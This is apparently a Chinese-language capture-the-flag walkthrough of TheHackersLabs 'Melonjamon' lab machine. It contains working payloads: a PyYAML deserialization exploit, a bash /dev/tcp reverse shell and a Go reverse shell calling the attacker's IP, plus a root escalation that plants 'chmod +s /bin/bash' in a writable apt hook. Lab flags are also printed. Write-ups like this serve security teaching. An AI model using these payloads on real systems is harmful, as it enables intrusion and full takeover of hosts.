TheHackersLabs-Melonjamon-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.165  08:00:27:ac:62:19       (Unknown)
192.168.60.254  00:50:56:f9:b3:de       (Unknown)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.977 seconds (129.49 hosts/sec). 4 responded
❯ export ip=192.168.60.165
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.165:22
Open 192.168.60.165:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-25 19:54 CST
Initiating ARP Ping Scan at 19:54
Scanning 192.168.60.165 [1 port]
Completed ARP Ping Scan at 19:54, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:54
Completed Parallel DNS resolution of 1 host. at 19:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:54
Scanning 192.168.60.165 [2 ports]
Discovered open port 80/tcp on 192.168.60.165
Discovered open port 22/tcp on 192.168.60.165
Completed SYN Stealth Scan at 19:54, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.165
Host is up, received arp-response (0.00096s latency).
Scanned at 2025-01-25 19:54:25 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:AC:62:19 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

编辑一下hosts，加一个域名

扫一下目录

❯ sudo vim /etc/hosts
192.168.60.165  melonjamon.thl
❯ gobuster dir -u http://melonjamon.thl -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://melonjamon.thl
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://melonjamon.thl/javascript/]
/gettingstarted       (Status: 308) [Size: 261] [--> http://melonjamon.thl/gettingstarted/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

发现有个文件上传的入口

yaml反序列化

看一下源代码中藏有提示

base64解码一下

❯ echo "eWFtbDogdGhlIHBhZ2UgaXMgdW5kZXIgY29uc3RydWN0aW9u"|base64 -d
yaml: the page is under construction%
yaml：该页面正在建设中

到这里就卡住了

看其他大佬的WP了解到是yaml的反序列化

Python Yaml Deserialization - HackTricks

这是 YAML 吗？| Peter Murphy — Is it YAML? | Peter Murphy

0-Day

该网站利用了PyYAML 作为底层解析器，通过load进行反序列化

我们可以新建一个yaml序列化后的数据

尝试利用ping，看一下靶机是否执行

❯ vim exp.yaml
yaml: !!python/object/apply:subprocess.check_output [['ping', '-c', '3', '192.168.60.100']]

上传yaml

抓一下包，发现是有回显的

尝试执行一下反弹shell的命令

修改yaml

❯ cat exp.yaml
yaml: !!python/object/apply:os.system ["bash -c 'bash -i >& /dev/tcp/192.168.60.100/4444 0>&1'"]

用户提权

重新上传，监听一下端口

❯ pwncat-cs -lp 4444
[19:03:58] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[19:06:51] received connection from 192.168.60.165:45142         bind.py:84
[19:07:10] 192.168.60.165:45142: registered new host w/ db                                                                              manager.py:957
(local) pwncat$                                                            
(remote) www-data@TheHackersLabs-Melonjamon:/$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
melon:x:1001:1001:,,,:/home/melon:/bin/bash

得知有个用户melon

发现www-data有sudo权限

(remote) www-data@TheHackersLabs-Melonjamon:/$ sudo -l
sudo: unable to resolve host TheHackersLabs-Melonjamon: Name or service not known
Matching Defaults entries for www-data on TheHackersLabs-Melonjamon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on TheHackersLabs-Melonjamon:
    (melon) NOPASSWD: /usr/bin/go

Golang反弹shell

可以利用go提权到melon

不过我在GTFOBins并未找到有关go的相关提权

不过你可以GPT一下，golang建立反向shell

package main

import (
    "os/exec"
    "net"
)

func main() {
    c, _ := net.Dial("tcp", "192.168.60.100:4444") // 与远程机器建立连接
    cmd := exec.Command("sh")                      // 启动 shell
    cmd.Stdin = c                                  // 将连接重定向为输入
    cmd.Stdout = c                                 // 将连接重定向为输出
    cmd.Stderr = c                                 // 将连接重定向为错误输出
    cmd.Run()                                      // 执行命令
}

也可以在revshells中找到

(remote) www-data@TheHackersLabs-Melonjamon:/tmp$ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.60.100:4444");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/exp.go
(remote) www-data@TheHackersLabs-Melonjamon:/tmp$ sudo -u melon /usr/bin/go run exp.go 

Root提权

定时任务

运行一下，虽然有点慢，但shell还是弹回来了

❯ pwncat-cs -lp 4444
[22:04:28] Welcome to pwncat 🐈!                           __main__.py:164
[22:05:35] received connection from 192.168.60.165:47334        bind.py:84
[22:05:35] 0.0.0.0:4444: upgrading from /usr/bin/dash to    manager.py:957
           /usr/bin/bash
[22:05:55] 192.168.60.165:47334: registered new host w/ db  manager.py:957
(local) pwncat$

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ cd ~
(remote) melon@TheHackersLabs-Melonjamon:/home/melon$ ls
user.txt
(remote) melon@TheHackersLabs-Melonjamon:/home/melon$ cat user.txt
043cdfa844231ba06fb3fd063252a7d5

再次信息收集

不过我找了很久都没获取有用信息

但当我传个pspy64上去发现root会定期执行apt update

2025/01/31 15:39:38 CMD: UID=0     PID=68818  | /usr/bin/apt update
2025/01/31 15:39:38 CMD: UID=0     PID=68819  | /usr/bin/apt update
2025/01/31 15:39:38 CMD: UID=0     PID=68820  | sh -c test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0     PID=68821  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0     PID=68822  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0     PID=68823  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0     PID=68824  | sh -c apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format='$(FILENAME)' 'Created-By: Packages'
2025/01/31 15:39:39 CMD: UID=0     PID=68825  | apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format=$(FILENAME) Created-By: Packages
2025/01/31 15:39:39 CMD: UID=0     PID=68826  | apt-get indextargets -o Dir::State::lists=/var/lib/apt/lists/ --format=$(FILENAME) Created-By: Packages
2025/01/31 15:39:39 CMD: UID=0     PID=68827  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:39 CMD: UID=0     PID=68828  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68829  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68830  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68831  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68832  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68833  | /usr/bin/perl -w /usr/bin/apt-show-versions -i
2025/01/31 15:39:41 CMD: UID=0     PID=68834  | /usr/bin/apt update
2025/01/31 15:39:43 CMD: UID=0     PID=68835  | /usr/bin/apt update

我查看一下apt的配置文件发现有个文件属于melon用户

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ ls -la /etc/apt/
total 36
drwxr-xr-x  8 root  root  4096 Jul 15  2024 .
drwxr-xr-x 74 root  root  4096 Jan 31 15:28 ..
drwxr-xr-x  2 melon melon 4096 Aug  4 13:18 apt.conf.d
drwxr-xr-x  2 root  root  4096 May 25  2023 auth.conf.d
drwxr-xr-x  2 root  root  4096 May 25  2023 keyrings
drwxr-xr-x  2 root  root  4096 May 25  2023 preferences.d
-rw-r--r--  1 root  root   780 Jul 15  2024 sources.list
drwxr-xr-x  2 root  root  4096 May 25  2023 sources.list.d
-rw-r--r--  1 root  root     0 Jul 15  2024 sources.list~
drwxr-xr-x  2 root  root  4096 Jul 15  2024 trusted.gpg.d

原来我之前find的时候忽略了

(remote) melon@TheHackersLabs-Melonjamon:/tmp$ find / -user melon 2>/dev/null |grep -Ev "proc|go-build"
/tmp/pspy64
/usr/lib/go-1.19/bin/go
/home/melon
/home/melon/.bashrc
/home/melon/.local
/home/melon/.local/share
/home/melon/.local/share/nano
/home/melon/user.txt
/home/melon/.bash_logout
/home/melon/.profile
/home/melon/.cache
/etc/apt/apt.conf.d
/etc/apt/apt.conf.d/00CDMountPoint
/etc/apt/apt.conf.d/01autoremove
/etc/apt/apt.conf.d/70debconf
/etc/apt/apt.conf.d/00trustcdrom
/etc/apt/apt.conf.d/20apt-show-versions
/dev/pts/2
/dev/pts/1

我们修改一下apt的配置文件，发现20apt-show-versions这个文件会在apt执行成功会再次执行test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i

(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ cat 20apt-show-versions
// When Apt's cache is updated (i.e. apt-get update)
APT::Update::Post-Invoke-Success {
"test -x /usr/bin/apt-show-versions || exit 0 ; apt-show-versions -i";
};

那我们直接把这个改了就行

赋予bash suid权限

(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ vi 20apt-show-versions
(remote) melon@TheHackersLabs-Melonjamon:/etc/apt/apt.conf.d$ cat 20apt-show-versions
// When Apt's cache is updated (i.e. apt-get update)
APT::Update::Post-Invoke-Success {
"chmod +s /bin/bash";
};

监控一下进程，执行成功了

2025/01/31 15:50:39 CMD: UID=0     PID=71892  | /usr/bin/apt update
2025/01/31 15:50:39 CMD: UID=0     PID=71891  | /usr/bin/apt update
2025/01/31 15:50:39 CMD: UID=0     PID=71893  | sh -c chmod +s /bin/bash
2025/01/31 15:50:39 CMD: UID=0     PID=71894  | /usr/bin/apt update
2025/01/31 15:50:40 CMD: UID=0     PID=71895  | /usr/bin/apt update
^C(remote) melon@TheHackersLabs-Melonjamon:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Mar 29  2024 /bin/bash
(remote) melon@TheHackersLabs-Melonjamon:/tmp$ bash -p
(remote) root@TheHackersLabs-Melonjamon:/tmp# id
uid=1001(melon) gid=1001(melon) euid=0(root) egid=0(root) groups=0(root),100(users),1001(melon)
(remote) root@TheHackersLabs-Melonjamon:/tmp# whoami
root
(remote) root@TheHackersLabs-Melonjamon:/tmp# cat /root/root.txt
06945fade02bb197ca68b33ed535f808

但是我不知道是如何实现定时执行的，root并没有设置crontab，算了懒得找了😀